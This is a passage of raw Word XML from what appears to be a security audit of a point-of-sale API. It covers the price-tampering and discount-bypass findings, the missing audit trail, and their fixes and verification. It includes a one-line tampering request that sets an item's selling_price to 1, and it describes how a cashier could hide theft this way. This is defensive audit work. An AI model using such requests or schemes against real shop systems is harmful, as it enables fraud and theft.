        <w:t xml:space="preserve">CWE-602</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CWE-807</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High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">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This is easy to misread as safe. The server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence.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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">InvoiceController::store</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> took the unit price straight off the request:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">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:62</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">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$sellingPrice = (float) $item['selling_price'];</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">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:63</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">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$discount     = (float) ($item['discount'] ?? 0);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">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did</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> compute the totals itself and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">did</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> force inv_by from the token. But computing a correct total from attacker-supplied line prices is not server-side control it just launders the attacker's numbers.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">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Exploit.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> As an ordinary cashier:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="182"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POST /api/invoices  items[0].selling_price = 1        (catalogue price: 32,000 LKR)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="182" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ 201 Created, INV0003, net_total persisted as 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The consequence is not merely underselling. The application has a complete discount-approval workflow: the cashier raises a DiscountRequest , an administrator reviews and approves or rejects it, a push notification is sent, and DiscountRequestController::approve applies it. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Every part of that was decorative.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A cashier wanting 30,000 LKR off simply typed a lower selling_price , and no approval was ever sought.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">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Two ways to steal, both invisible in the books: sell at a private price to an accomplice, where the invoice, the stock movement and the profit report all agree with each other; or apply any discount with no approval record behind it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">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Root cause.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A trust boundary drawn in the wrong place. The design treats the till as part of the system rather than as a client. That is defensible for a cash drawer in a locked shop and indefensible for an HTTP API but the distinction is invisible unless someone asks "what if the request did not come from our own UI?"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">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store() restructured into </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resolve, then persist</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E">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Products</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - price from the grn_items batches that FIFO actually allocates, quantity-weighted when one line spans several batches at different prices. Stock allocation therefore moves earlier in the method; it already ran inside one transaction, so atomicity is unchanged.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">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Services</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - from services.price , looked up by the id encoded in the line's product_code as SVC-&lt;id&gt; .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">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Discounts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - require an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">approved, unconsumed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> DiscountRequest raised by the same cashier, capped at the approved amount.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">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client's submitted price is treated as advisory and a mismatch is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rejected</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a 422 naming the line, not silently corrected. Silent correction would let a cashier hand the customer a receipt showing one figure while the books recorded another, and would hide genuine drift between the till and the catalogue.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">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Frontend defence in depth.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> buildInvoicePayload() now sends only the operator's choices and the expected catalogue quote. It deliberately omits total_amount , net_total , balances, credit allocation and inv_by ; those are server-derived from locked records and the authenticated token. This does not replace server validation - DevTools can still add fields - but it prevents the normal UI from pretending to author values the server must own. Four Vitest regression tests assert that boundary.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">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Approvals were made </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">single-use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( consumed_at , consumed_inv_no ). Without that, one approval for "Rs 2,000 off a Michelin tyre" could be replayed on every later sale of that product, forever. It also gives auditors a direct link from a discounted line back to the administrator who authorised it.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">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Verified.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Price tamper → 422, no stock consumed. Correct price → 201. Unapproved discount → 422. Approved discount → accepted </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumed. Replay → 422. Over-cap → 422. Another cashier's approval → 422.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">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V-11 · No security audit trail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="166" w:before="280" w:line="265"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A09:2021 · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-778</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CWE-532</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Medium</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">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application recorded nothing that would let an incident be reconstructed. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Failed logins were not logged at all</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118">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AuthController:73 wrote a line only when login </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">threw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so a wrong password produced no record and the 20-attempt spray in V-05b left no trace.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">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Worse, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">invoice cancellation actively destroyed the evidence</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: update():446-487 overwrites total_amount , net_total and every line's selling_price with 0 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in place</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. After cancelling there was no way to distinguish a voided 500,000 LKR sale from a voided 500 LKR one, and no record of who voided it.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">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matters because cancelling an invoice is the classic way theft is concealed in a POS: take the cash, void the sale, and the stock returns to the shelf as though nothing happened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">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An audit_logs table recording action, severity, actor, subject, a before/after JSON diff, and request provenance.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">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AuditLog is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">append-only in code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: performUpdate() and delete() throw  because an audit trail an attacker can edit is not an audit trail. A single AuditLogger writes every event </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">twice</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: to the table (queryable) and to a separate security log channel with 90-day retention (shippable to a SIEM, and the copy that survives if the database is what was compromised). Its level is pinned to info independently of LOG_LEVEL , because the hardened .env.example sets LOG_LEVEL=warning in production and would otherwise discard successful-login records.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">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Failures are swallowed after being reported  a business operation must never fail because its audit row could not be written, or the audit system becomes a denial-of-service vector. Secrets are redacted at any nesting depth before writing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">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GET /api/audit-logs (admin-only, read-only) makes the trail reviewable: recording the event satisfies half the control, detecting the incident needs the other half.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">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V-12 · Vulnerable and outdated components</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
